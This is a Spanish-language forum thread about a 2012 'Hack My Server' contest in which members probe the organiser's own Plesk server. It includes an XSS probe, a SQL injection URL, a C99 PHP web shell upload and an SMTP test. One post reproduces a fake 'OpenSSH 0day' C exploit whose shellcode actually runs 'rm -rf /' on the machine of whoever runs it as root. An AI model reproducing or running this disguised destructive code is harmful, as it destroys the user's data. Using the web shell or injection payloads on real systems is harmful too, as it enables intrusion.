¿Alguien me puede reenviar la contraseña de Plesk que se me olvidó guardarla? xDDDD

Es por no volver a formatear xd



h1t gracias por el foro brasileño, es pura dinamita, existen exploit hasta de Firefox para lammers xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 8 Mayo 2012, 11:19 am

MMMMMMM ESE EXPLOIT NO FUNCIONA...
Y un consejo.... Si cogeis exploits de webs, al menos leer la explicacion... o intentar entender el código y no compileis y lanceis por que quizas algún día os lleveis un susto... O al menos corrobar con muchas webs para ver si el exploit es fiable o algo.....

Tienes razón, es importante saber para que sirven y que vulnerabilidad explotan, (por ese motivo he pedido referencias sobre el mismo) sin embargo compilar y ejecutar un exploit para comprobar su funcionamiento no deberia dar "ningun susto" a menos que se sea lo suficientemente torpe como para ejecutarlo directamente desde la máquina y no en un entorno de pruebas como por ejemplo, una maquina virtual, creo que eso es básico cuando se realiza cualquier procedimiento de pentesting.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 8 Mayo 2012, 16:57 pm
m0rf tio.... no iba por ti XDD
te has molestado en leer el exploit que cite? y en ver la página que puse? XD
No es el mismo que el que has puesto tu de security focus es el del sshd... Fíjate....
Saludos

Es que con tantos mensajes y cuadros al final me lio.

Nada entonces.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Once en 8 Mayo 2012, 17:11 pm
Bueno, hoy hice un Reverse Ip y me tiro dos dominios:
Citar
p*************s.com
v***.***.es

En uno de ellos está el phpinfo() donde aparte de la versión de php (PHP Version 5.3.2-1ubuntu4.14) tenemos información que nos puede ser importante como el correro del admin (root@********.************.net) versión de OpenSSL (OpenSSL 0.9.8k) y demás

Voy de salida así que no pude buscar más, pero por el momento encontre esto:

http://www.exploit-db.com/exploits/8720/
https://www.ccn-cert.cni.es/index.php?option=com_vulnerabilidades&task=view&id=5436&Itemid=96&lang=es

PD: ¿Ahora con la cuenta del Plesk, el objetivo es el mismo o sólo atacar la aplicación web?

Saludos!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 8 Mayo 2012, 17:22 pm
Citar
En uno de ellos está el phpinfo() donde aparte de la versión de php (PHP Version 5.3.2-1ubuntu4.14) tenemos información que nos puede ser importante como el correro del admin (root@********.************.net) versión de OpenSSL (OpenSSL 0.9.8k) y demás

Sí, el phpinfo() lo subí ayer para quien lo encontrara ;-)

El dominio p*************s.com está controlado pero en v***.***.es ni p**a idea de cual es, supongo que será de alguien del foro, ahora miraré.

11Sep Acabo de acceder y no encuentro nada de v***.***.es ¿Puedes enviarmelo por privado cual es y donde lo ves?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 8 Mayo 2012, 17:23 pm

PD: ¿Ahora con la cuenta del Plesk, el objetivo es el mismo o sólo atacar la aplicación web?

Saludos!

Segun tengo entendido la cuenta plesk la creo para k podamos avanzar un poco mas pero el objetivo es el mismo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 8 Mayo 2012, 20:44 pm
pues estuve probando un buen de cosas, metasploit, varios exploit, entre ellos varios que aquii utilizaron... lo bueno es que ya hubo  quien lo intento con los que poste hace tiempo y pues al parecer tampoco funcionaron e incluso e estado leyendo los bugs de esta paina para encontrar algo pero la mayoria son locales

http://xss.cx/examples/plesk-reports/xss-reflected-cross-site-scripting-cwe79-capec86-plesk-parallels-control-panel-version-20110407.20.html

tambien vi un explot para debian, OpenSSH 5.3p1 Debian
 intente con este

Código:
* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/
 
#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
 
void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}
 
unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";
 
unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";
 
int main(int argc, char **argv)
{
 
    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;
 
    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }
}

pero tampoco, espero pronto haya mas suerte



Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 8 Mayo 2012, 20:54 pm
No es ningun agujero, pero ¿he podido enviar un email haciendo telnet al puerto 25?

********************************************
HELO -----------------.net
250 -----------------.net
MAIL FROM: <lola@elhacker.net>
250 2.1.0 Ok
RCPT TO: <lola@elhacker.net>
554 5.7.1 <lola@elhacker.net>: Relay access denied
RCPT TO: <lola@-----------------.net>
550 5.1.1 <lola@-----------------.net>: Recipient address rejected: User unknown in virtual alias table
RCPT TO: <root@-----------------.net>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
Prueba de envio


.
250 2.0.0 Ok: queued as 71F025B4094
********************************************


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 8 Mayo 2012, 20:59 pm
Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 8 Mayo 2012, 21:19 pm
como? Que ha pasado?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Stakewinner00 en 8 Mayo 2012, 21:21 pm
Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.

Me podeis decir k tiene de  malo la reverse IP??


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 8 Mayo 2012, 21:24 pm
Me podeis decir k tiene de  malo la reverse IP??



Nada, el problema es que publique aquí la IP.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 8 Mayo 2012, 21:31 pm
Sorry, no me habia dado cuenta.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 8 Mayo 2012, 21:34 pm
Sorry, no me habia dado cuenta.

Nada, nada, te envío los datos de PLESK.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 8 Mayo 2012, 21:56 pm
haciendo un escaneo me encontre con esto pero creo tampoco funciona  :-\

o a lo mejor es local

http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.


P.D. dimitrix me mandas los datos de plesk porfavor


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Once en 8 Mayo 2012, 22:09 pm
11Sep Acabo de acceder y no encuentro nada de v***.***.es ¿Puedes enviarmelo por privado cual es y donde lo ves?

El servicio que usé fue: http://www.domaintools.com/research/reverse-ip/


Tenía entendido que se podía subir shell por el phpinfo() modifiqué las cabeceras con HTTP Live Headers pero no resultó (ni un XSS).

Saludos!


Bueno, heche un vistazo en el Plesk y subi una phpshell
http://p*************s.c*m/css/C99.php (safemode off  ;D), di permisos 777 a la carpeta para poder "trabajar" tranquilo, compile y probe este (https://foro.undersecurity.net/read.php?15,1679,7459#msg-7459) exploit (el segundo) pero no me sirvio. No cuento con más tiempo así que creo que por hoy termine.

Saludos!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: kasiko en 9 Mayo 2012, 02:06 am
En este concurso voy muuuy retrasado  :huh:


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 9 Mayo 2012, 02:19 am
Dimitrix podrias enviarme por mp la cuenta del plesk porfavor


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 9 Mayo 2012, 09:03 am
Recordar que el objetivo ahora con un simple LINK conseguir un XSS o un SQLi del PLESK.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 9 Mayo 2012, 09:56 am
A todo esto, me han pedido que haga una pequeña conferencia (o taller) sobre seguridad informática tirando a aplicaciones web que es mi fuerte, la realizaré después de verano en la universidad de Valencia.

It's Free. Quien quiera ir que me lo diga por privado y le aviso.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 9 Mayo 2012, 13:47 pm
Grábalo y lo subes a YouTube :P
(No podre ir a Valencia)

Saludos y nos nos desviemos del tema xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: tremolero en 9 Mayo 2012, 14:52 pm
bufff.... que duro se me hace ver a gente escribiendo todo el rato en el foro y a mi que no se me ocurre nada ni veo nada.... que triste :S pero bueno, seguire mirando jejeje...

Dimitrix si puedes pasarme la cuenta de plesk ^^ y de la conferencia, ya que estamos avisame tambien ;) aunque creo que seria mejor que abrieras un post o algo, porque como tengas que avisar todos xDD, pero eso ya es decision tuya.

Un saludo


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 9 Mayo 2012, 20:17 pm
Echad un vistazo aqui; habla de xss e injecciones sql contra plesk, con ejemplos:

http://www.exploit-db.com/exploits/15313/
http://www.cloudscan.me/2010/09/xss-sql-injection-in-plesk-small.html

Para los que andan perdidos, les aconsejo que instalen el add-on "live http headers" de firefox, les ayudara a ver la informacion (parametros/datos) intercambiada en comunicaciones http. Tmb pueden usar  un proxy local como webscarab ó paros (más sencillo)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 9 Mayo 2012, 20:54 pm
No me funciona ninguna.
Parece que los enlaces que he pasado son injecciones para plesk sobre windows.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 9 Mayo 2012, 21:37 pm
Yahooooooooooo!!!

Ahí va una sqli; para que funcione debeis estar logeados en plesk:

http://********************.net:8880/admin/customer/list?force-show-search=true&searchFilter[resourceUsage][searchText]=overuse%27

Error
Internal error: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 6
Message    SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '))' at line 6
File    Pdo.php
Line    238
Type    Zend_Db_Statement_Exception


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 9 Mayo 2012, 21:43 pm
Aqui hay la leche de vulnerabilidades sqli, xss, ... (buscad por plesk y SO):

http://www.cloudscan.me/

He usado una sqli de aqui (hay más para probar):

http://www.cloudscan.me/2011/09/plesk-parallels-panel-version-psa.html


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: adastra en 9 Mayo 2012, 21:52 pm

No había leído los últimos mensajes, se creado una cuenta para acceder al panel de control de plesk???
@dimitrix Podrías enviarme la cuenta de ese usuario por privado por favor?
Gracias.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 9 Mayo 2012, 22:30 pm
Lo que interesa es un XSS para hacer envenenamiento de Cookie ¿Alguien tiene alguno que le funcione?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 9 Mayo 2012, 23:33 pm
en el pagina 13 puse una XSS que encontre en un escaneo, pero no se si no supe utilizarla o no funciona, la hice con wapiti un scanner GPL, este fue el resultado

Código:
http://xx.xxx.xxx.180/?mod=<script>alert(document.cookie)</script>&op=browse
Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
Referencias:
  http://www.cert.org/advisories/CA-2000-02.html

luego hice un scaneo con nikto y me dio el mismo resultado

Código:
+ /?mod=<script>alert(document.cookie)</script>&op=browse - 200/OK Response could be Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.

por cierto dimitrix, me podrias mandar los datos de plesk porfavor


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 9 Mayo 2012, 23:47 pm
?mod=<script>alert(document.cookie)</script>&op=browse

No es vulnerable, lo acabo de probar, ahora mismo te mando la pass.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 10 Mayo 2012, 01:03 am
En esta pagina se encuentra todo lo que se puede hacer para el plesk 10.2 teniendo una cuenta que no solo muestra SQLi ni XSS tambien muestra XML injection,SSL cookie without secure flag set, etc... pero son para RedHat todos los procedimiento pero yo creo que debe ser muy parecido, pero no puedo hacer nada porque todavia dimitrix no me entrega la cuenta del plesk pero por si alguien quiere intentar aqui esta http://xss.cx/examples/plesk-reports/plesk-redhat-el6-psa-10.2.0-build-1011110331.18-xss-sqli-cwe79-cwe89-javascript-injection-exception-example-poc-report-paros-burp-suite-pro-1.4.1.html  ;D


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: vanchopper en 10 Mayo 2012, 05:27 am
Hola, dimitrix, me podrias mandar la ip,  me gustaria participar.. no tengo muchos conocimientos .. pero lo veo como buena oportunidad para aprender...
 Saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 10 Mayo 2012, 18:42 pm
hola dimitrix

todavia no me llega el pass, espero esten funcionando bien los mensajes privados... bueno, seguire esperando

salu2


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: maxim_o en 10 Mayo 2012, 20:37 pm
MMMM pues no será se si será vuestro caso o no....
Pero en un post, dijo que ya no se daría a nadie más la ip, y la cuenta del plesk solo se la daría a la gente que le habia dado ip o algo asi....

Aunque no estoy muy seguro ya que se han llenado muchos post inservibles cuando dijo que las ip, cuentas del plesk o lo que fuera se pidieran POR PRIVADO.
Si no contesta pueden pasar dos cosas....
1.- QUe no se haya conectado... La gente aunque parezca mentira tiene vida aparte del foro...
2.- QUe de momento no de mas ips
3.- Ni idea... pero algun motivo tendrá

Saludos!!


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 10 Mayo 2012, 20:51 pm
¿Alguien sabe si PHP esta configurado como CGI o como modulo del servidor web?

Hace unas semanas apareció una vulnerabilidad bastante gorda que afecta a los servers con php configurado como cgi.

http://www.pentester.es/2012/05/explotando-php-cgi.html

¿Se podría configurar como cgi para probarlo?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: pwnz en 10 Mayo 2012, 21:45 pm
Si no me equivoco no está como cgi, por lo menos lo que yo intenté no dio ningún resultado >:(


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 11 Mayo 2012, 03:16 am
Yo creo que el servidor al no tener ninguna aplicacion y toda esta bien configurado y sobre todo porque no tiene nada es muy seguro, el hecho de que no tenga nada hace que sea mas dificil encontrarle una vulnerabilidad a pesar de que no tenga firewall activado asique ojala le coloquen mas aplicaciones para poder testear mas facilmente xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 12 Mayo 2012, 13:08 pm
El servicio que usé fue: http://www.domaintools.com/research/reverse-ip/


Tenía entendido que se podía subir shell por el phpinfo() modifiqué las cabeceras con HTTP Live Headers pero no resultó (ni un XSS).

Saludos!


Bueno, heche un vistazo en el Plesk y subi una phpshell
http://p*************s.c*m/css/C99.php (safemode off  ;D), di permisos 777 a la carpeta para poder "trabajar" tranquilo, compile y probe este (https://foro.undersecurity.net/read.php?15,1679,7459#msg-7459) exploit (el segundo) pero no me sirvio. No cuento con más tiempo así que creo que por hoy termine.

Saludos!

Hola:

Uno que he visto muy bueno es este de abajo. Lo bueno que tiene es que puedes descargar o actualiza la base de datos.
http://ipinfodb.com/

(http://www.innovatel.eu/images/INNOVATEL.jpg)


Un cordial saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: D_pit_88 en 13 Mayo 2012, 13:41 pm
***** llegue tarde , por que nadie me avisa ?


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 14 Mayo 2012, 12:46 pm
***** llegue tarde , por que nadie me avisa ?

No pagaste la cuota.



No tengo 'nada' de tiempo. Alguien que sepa de Linux y pueda instalar sin problemas la versión anterior de proFTP para probar la vulnerabilidad?

Logicamente le doy la cuenta SSH.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: D_pit_88 en 14 Mayo 2012, 18:03 pm
yo puedo dejarte mi ordenador como servidor para probar la vulnerabilidad del proFTP en un ubuntu


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 14 Mayo 2012, 18:09 pm
yo puedo dejarte mi ordenador como servidor para probar la vulnerabilidad del proFTP en un ubuntu

Tenemos un servidor, gracias.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: D_pit_88 en 14 Mayo 2012, 18:24 pm
ok si en un futuro necesitáis otro servidor cuenta con migo ;)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 14 Mayo 2012, 18:30 pm
ok si en un futuro necesitáis otro servidor cuenta con migo ;)

De todos modos D_pit_88 el mes que viene hacemos otro Hack My Server que seguramente será "Hack My Server: Wordpress".


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: D_pit_88 en 14 Mayo 2012, 19:32 pm
espero estar por aquí por entonces


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 14 Mayo 2012, 20:31 pm
jeje ya se esta planeando otro sobre wordpress... que bien, solo que antes de ese, me podrian mandar la constraseña de plesk jeje es que no me llega o no se si ya no esta disponible o que paso?

salu2


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 15 Mayo 2012, 03:26 am
Mira en tu bandeja de mensajes (del foro).


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 15 Mayo 2012, 20:03 pm
ESTE CONCURSO HA TERMINADO

Al parecer el objetivo inicial ha estado demasiado alto. Así que después de meditar y comentarlo con algunos usuarios del foro. Hemos decidido ir haciendo progresivamente más difícil los objetivos (no al contrario).

El premio (la cerveza alemana) lo ha ganado Belial & Grimoire. Aquí (http://foro.elhacker.net/hacking_avanzado/concurso_nordm1_hack_my_server-t360003.0.html) tenéis la lista con los puntos.

El 2º Concurso será de atacar un WordPress.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Meta en 15 Mayo 2012, 22:42 pm
Han conseguidos cosas.  Felicidades.

Eso si, menudo server tiene en seguridad. A aprender se ha dicho.

Saludo.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Puntoinfinito en 15 Mayo 2012, 23:44 pm
Felicidades! A disfrutar de tu premio! xD


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: m0rf en 16 Mayo 2012, 19:00 pm
ESTE CONCURSO HA TERMINADO

Al parecer el objetivo inicial ha estado demasiado alto. Así que después de meditar y comentarlo con algunos usuarios del foro. Hemos decidido ir haciendo progresivamente más difícil los objetivos (no al contrario).

El premio (la cerveza alemana) lo ha ganado Belial & Grimoire. Aquí (http://foro.elhacker.net/hacking_avanzado/concurso_nordm1_hack_my_server-t360003.0.html) tenéis la lista con los puntos.

El 2º Concurso será de atacar un WordPress.

Me parece estupendo que lo hagáis más difícil la proxima vez y no al contrario. Buen criterio.

Felicidades al ganador!



Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: opportunity en 16 Mayo 2012, 20:01 pm
whathefuck!!! -1000 puntos? y yo pensando que me podia llevar las chelas.
¿que puedo decir? uhmmmm! los errores se pagan

En cualquier caso, enhorabuena a Belial y tmb a Grimoire. (No sabia que se podian hacer equipos).


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 16 Mayo 2012, 20:29 pm
opportunity
 - Lo de -1000 puntos Is a Joke (es una broma).
 - Además que es se envía solo a users de España por eso de pagar transporte Internacional.
 - Además no se ha realizado ningún equipo, ese es el nombre de un solo usuario.


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: Belial & Grimoire en 16 Mayo 2012, 21:28 pm
 ;-) jeje, que bien logre ganar algo por primea vez en este foro

gracias

jeje soy solo uno... belial es mi nick, pero de broma me dicen, que parece que soy bipolar  :silbar: y lo llame grimoire

esa es la unica razon por la que soy belial & grimoire, pero solo soy uno jeje


pero vamos a lo importante... y mi cerveza?  ;D jaja


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: dimitrix en 16 Mayo 2012, 21:35 pm
Por privado.

FELICIDADES :-)


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: s4dr10s en 18 Mayo 2012, 02:05 am
y finalmente colocaran la version eplotable del Proftp? para practicar aunque sea ajajaja


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: chocapic56 en 22 Mayo 2012, 19:19 pm
interesante bueno les cuento que me servira para practicar los conocimientos adquiridos en el ethical hacking... che me podes decir si los que recien nos suscribimos podemos participar tambien? si es asi donde me anoto? saludos


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: tremolero en 22 Mayo 2012, 19:31 pm
chocapic56, el concurso se termino :(

el motivo fue que el nivel era demasiado dificil,vamos que eramos incapaces xDD o eso parece.

Tengo entendido que posiblemente haga un concurso nuevo, de atacar un wordpress, pero eso ya depende de dimitrix, que es quien lo organizo.

Este termino :(

Saludos...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: vidalpc2010 en 22 Mayo 2012, 22:12 pm
no van a publicar la forma de hackear el servidor y si no es asi un favor me podrian decir donde puedo sacar informacion para aprender a hacerlo, se los agradecere mucho y solo les comento que es para cuestion cultural ya que no veria la forma de utilizarlo para algo mal


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: tremolero en 23 Mayo 2012, 02:19 am
vidalpc2010 no van a publicar la forma de hackear el servidor, ya que nadie lo logro.

Asi que supongo que lo unico que te puedo indicar es que te dediques a leer todo lo que puedas o recopilar toda la informacion que puedas.

Suerte.


saludos...


Título: Re: Concurso Nº1: "Hack My Server"
Publicado por: H1tchclock en 23 Mayo 2012, 20:55 pm
Un buen lugar para empezar es aqui: http://www.elhacker.net/Textos1.html (http://www.elhacker.net/Textos1.html). A lo minimo te servira para saber como funciona en teoria, y los posts con chincheta igualmente, busque el libro "El Hacking Etico" en Pdf, esta en algun lugar del foro. Saludos desde Bolivia.  ;)